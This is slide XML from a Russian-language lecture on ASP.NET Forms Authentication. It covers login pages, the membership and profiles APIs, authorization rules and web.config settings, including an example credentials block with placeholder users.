            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Имеется полный контроль  над процессом аутентификации;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Имеется полный контроль над видом страницы подключения (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>login form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> имеются стандартные элементы подключения (Login control).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Может работать с любым браузером, так как использует стандартный </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>HTML;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Позволяет самому определить способ хранения информации о пользователе.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Используется своя страница подключения (login page), которая проверяет имя и пароль пользователя в собственной БД приложения. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Затем инфраструктура задает контекст безопасности для каждого последующего запроса (во многих случая используя куки).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="200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sz="3600" smtClean="0"/>
              <a:t>Хранение информации о пользователях</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4997450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Метод Forms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>uthentication по умолчанию хранит описание пользователей в файле web.config.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Однако можно хранить эту информацию  в любом месте. Для этого нужно написать код чтения требуемых данных. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>При использовании membership API, даже не требуется писать собственный код для хранения информации о пользователях в базе данных.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Такая гибкость хранения информации позволяет управлять созданием и администрированием учетными записями пользователей. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Можно добавить дополнительную информацию о пользователях, например, предпочтения пользователей по внешнему виду web сайта. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Можно добавить специфическую для бизнеса информацию, например, шифрованную информацию о кредитных карточках, если создается он-лайн магазин. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>В дополнение к membership API в</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>введен profiles API, который позволяет хранить дополнительную информацию пользователей отдельно от их учетных записей.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8229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" smtClean="0"/>
              <a:t>Реализация </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>Forms Autentification</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3600" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>1. Настроить аутентификацию с использованием форм в файле </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>2. Сконфигурировать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>, чтобы разрешал анонимный доступ к виртуальному каталогу и скофигурировать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>для ограничения анонимного доступа к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>приложению.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>3. Создать собственную страницу подключения (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>login page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>которая собирает и проверяет имя и пароль пользователя, а затем проверяет их и сообщает среде аутентификации о результате проверки.</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28600"/>
            <a:ext cx="8382000" cy="695325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Authentication and Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1417638"/>
            <a:ext cx="8410575" cy="5375275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Authentication Modes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Mode=None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Mode=Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Mode=Forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Authorizing clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Authorization element used to describe which clients are granted access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Supports sub elements allow and deny</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Users, roles, verbs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>? represents anonymous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>* represents all clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The first match found (allow or deny) determines authorization</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706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Конфигурирование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0"/>
              <a:t>Forms Authentification</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="1052513"/>
            <a:ext cx="4465638" cy="5805487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Общий вид</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&lt;authentication mode="Forms"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>&lt;!-- Detailed configuration options --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&lt;/authentication&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Все данные</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&lt;authentication mode="Forms"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&lt;!-- Detailed configuration options --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&lt;forms name="MyCookieName"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>loginUrl="DbLogin.aspx"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>timeout="20"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>slidingExpiration="true"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>cookieless="AutoDetect"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>protection="All"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>requireSSL="false"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>enableCrossAppRedirects="false"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>defaultUrl="MyDefault.aspx"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>domain="www.mydomain.com"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>path="/" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&lt;/authentication&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52228" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4716463" y="1052513"/>
            <a:ext cx="4427537" cy="4800600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> задание описаний пользователей</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>&lt;authentication mode="Forms"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>   &lt;!-- Detailed configuration options --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>   &lt;forms name="MyCookieName"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>       loginUrl="DbLogin.aspx"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>       timeout="20"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>       &lt;credentials </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1"/>
              <a:t>passwordFormat="Clear"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>           &lt;user name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>dmin"  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>               passwo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t>rd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>=“aaaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>            &lt;user name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>ario" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>               password=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>bbbbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>            &lt;user name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>petr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>               password=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ccccc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>       &lt;/credentials&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>   &lt;/forms&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>&lt;/authentication&gt;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777875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Параметры Forms Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="381034" name="Group 106"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="395288" y="1125538"/>
          <a:ext cx="8229600" cy="4932362"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1377950"/>
                <a:gridCol w="1728787"/>
                <a:gridCol w="5122863"/>
              </a:tblGrid>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Параметр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charset="0"/>
                        </a:rPr>
                        <a:t>По молчанию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Описание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charset="0"/>
                        </a:rPr>
                        <a:t>name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charset="0"/>
                        </a:rPr>
                        <a:t>.ASPXAUTH</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charset="0"/>
                        </a:rPr>
                        <a:t>Имя </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>HTTP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ru-RU" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
